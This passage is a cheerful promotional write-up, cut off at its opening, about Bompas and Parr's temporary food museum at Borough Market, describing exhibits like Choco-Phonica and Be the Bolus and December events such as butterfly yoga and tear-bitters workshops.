the Field to Table, Mouth… and BEYOND! No longer will you need to go to infinity for an out of this world experience, but just down to Borough Market where you will find a whole MUSEUM dedicated to that glorious thing that we call food. Opening for three months only, Bompas and Parr are coupling all the weird and wonderful elements of food with the traditions of a museum.

Creating a series of disruptive and experimental exhibits including Choco-Phonica, a sonic wonderland focused on chocolate where you will experience taste against sound and Be the Bolus, a Peristalsis Experience that offers an immersive digital journey throughout the body, the museum will explore food like never before, and with the basement of the museum already being filled with that boozy cloud, you might quite literally feel a like you’ve travelled BEYOND to a whole other world.

On top of all that, they’ve added some extra special installations for December…exclusive sessions of hot tropical yoga with live butterflies, a workshop where you can make bitters from your own tears (perfect gifts for those who have everything), and a joyful Christmas jelly making session.
